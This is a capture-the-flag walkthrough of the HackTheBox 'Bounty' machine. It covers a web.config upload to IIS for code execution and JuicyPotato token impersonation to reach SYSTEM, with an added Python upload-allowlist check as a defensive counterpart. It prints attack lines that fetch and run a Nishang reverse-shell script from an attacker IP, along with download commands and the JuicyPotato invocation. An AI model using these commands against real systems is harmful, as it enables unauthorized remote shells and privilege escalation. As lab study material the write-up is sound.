HackTheBox “Bounty” Walkthrough
Bounty is an easy-rated Windows machine on HackTheBox. The objective is to gain remote code execution on a Windows IIS/ASP web server by uploading a web.config file, then escalate privileges to SYSTEM through token impersonation.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to scan for open ports and services:
Visit the target on port 80.
Perform a directory scan against the Microsoft IIS server with the “Feroxbuster” tool. Use the larger wordlist that ships with Kali and target the asp, aspx, and txt extensions with the following command:
feroxbuster -u http://10.10.10.93/ -x asp,aspx,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 100 -s 200,301 -n
Visit the transfer.aspx page.
The website has a file upload feature. When we try to upload a PNG file, the site confirms the upload succeeded, and the image can be viewed at http://10.10.10.93/UploadedFiles/[image name], which is the second directory discovered by Feroxbuster above.
Browse for the Bounty machine info image.
Upload.
Verify.
We will use Burp Intruder to determine which extensions are allowed by intercepting the file upload request.
Use Burp Suite to intercept the upload request for the Bounty information image.
Send it to the Intruder.
Select the Sniper attack type and mark the file extension as the payload position.
We will use the raft-small-extensions.txt wordlist from [SecLists] and move it to the working directory.
Use the “cut” utility to strip the leading dots from the wordlist entries so that Burp does not URL-encode them.
In the “Payloads” tab, select “Runtime file” as the payload type and browse for the wordlist we prepared.
Start the attack.
One of the allowed extensions seems to be “config.”
After some research, I found a web.config file that enables Remote Code Execution (RCE) through the file upload functionality: IIS interprets a web.config placed in a served directory, so the uploaded file can run code. We will download the file to our attack box and configure it with the path from which it downloads the Nishang Invoke-PowerShellTcp PowerShell script.
Download and prepare the Nishang Invoke-PowerShellTcp PowerShell script by appending it with the command below.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4343
Start an HTTP server in the current directory.
Start a listener.
Browse for the web.config file.
Upload.
Trigger it on the URL http://10.10.10.93/UploadedFiles/web.config
On our HTTP server we notice that the powershell script has been downloaded.
And we get a shell on our listener.
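The root cause above is a server-side extension filter that lets “config” through, so IIS ends up interpreting an attacker-supplied web.config in the UploadedFiles directory. As an added defensive counterpart (this is not code from the original walkthrough), the Python check below shows the allowlist an upload handler should apply instead: it assumes the form was only meant to accept images and that uploads land in a directory IIS serves, and it normalizes the Windows filename quirks (case, trailing dots, client-supplied paths, double extensions) that let a reserved name slip through.

```python
import os
from pathlib import PureWindowsPath

# Constructed allowlist: the Bounty upload form was meant to accept images only.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# Names IIS interprets when they appear in any served directory. These must never
# be writable through an upload form, whatever the extension filter allows.
RESERVED_NAMES = {"web.config", "global.asax"}


def normalize_upload_name(raw_name: str) -> str:
    """Reduce a client-supplied filename to the basename Windows would actually store."""
    # Drop any client-supplied directory component (Windows or POSIX separators).
    name = PureWindowsPath(raw_name.replace("/", "\\")).name
    # Win32 silently strips trailing dots and spaces, so "web.config. " is stored as web.config.
    name = name.rstrip(". ")
    # A NUL byte can truncate the name in C-based file APIs; refuse rather than trim.
    if "\x00" in name:
        return ""
    return name.lower()


def is_upload_allowed(raw_name: str) -> bool:
    """Return True only for names that are safe to store in a web-served upload folder."""
    name = normalize_upload_name(raw_name)
    if not name or name in RESERVED_NAMES:
        return False
    root, ext = os.path.splitext(name)
    # Require exactly one extension (rejects shell.aspx.png style names) and that it is allowlisted.
    if not root or "." in root or ext not in ALLOWED_EXTENSIONS:
        return False
    return True


def find_unexpected_files(upload_dir: str) -> list:
    """Defender's check: list files already in upload_dir that the allowlist would not have accepted."""
    hits = [e.name for e in os.scandir(upload_dir) if e.is_file() and not is_upload_allowed(e.name)]
    return sorted(hits)


if __name__ == "__main__":
    # Constructed sample names, including the one used in this walkthrough.
    for candidate in ["bounty.png", "web.config", "Web.Config.", "..\\web.config", "shell.aspx.png"]:
        print(f"{candidate!r:22} -> {'allowed' if is_upload_allowed(candidate) else 'rejected'}")
```

Running find_unexpected_files against the IIS upload directory is a quick way to spot a planted web.config after the fact.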
Start a system information enumeration.
The output reveals several useful details. First, the OS is Windows Server 2008 R2 with no hotfixes installed, which suggests it is vulnerable to a kernel exploit. Second, it confirms the host is 64-bit, which matters when choosing tool builds.
Subsequently, I proceeded to collect information about the current user’s privileges using the following command:
The finding of enabled SeImpersonatePrivilege implies that I can leverage a potato attack to escalate privileges to SYSTEM.
Obtain a copy of JuicyPotato.exe from its GitHub repository (linked in the original post); make sure to get the 64-bit build of the executable.
Meanwhile, our HTTP server in the working directory of our attacking box remains operational.
Create a temp directory on the C: drive and download JuicyPotato onto the target machine using the command below.
(new-object net.webclient).downloadfile('http://10.10.14.8:8080/JuicyPotato.exe', '\temp\JuicyPotato.exe')
Let’s run the exploit.
To run the tool successfully, we need a port number for the COM server and a valid CLSID. There are two options: use the list the tool authors provide for the matching Windows version, or run the following PowerShell script to extract the CLSIDs from the current system:
I will use a batch script to download the Nishang PowerShell script. On the attacker machine, use the following command to craft a batch script:
echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')" > shell.bat
Download the batch script onto the target box using the command below.
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.8:8080/shell.bat', '\temp\shell.bat')
The setup is complete, and we are ready to run the exploit. In case the default CLSID fails, the tool's publisher provides a list of alternative CLSIDs to try (linked in the original post).
Considering that the target system runs Windows Server 2008 R2, the following CLSIDs are applicable:
Start a listener.
Let’s proceed with using the first CLSID from the list.
./JuicyPotato.exe -l 4343 -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
A SYSTEM shell is obtained.
Cheers.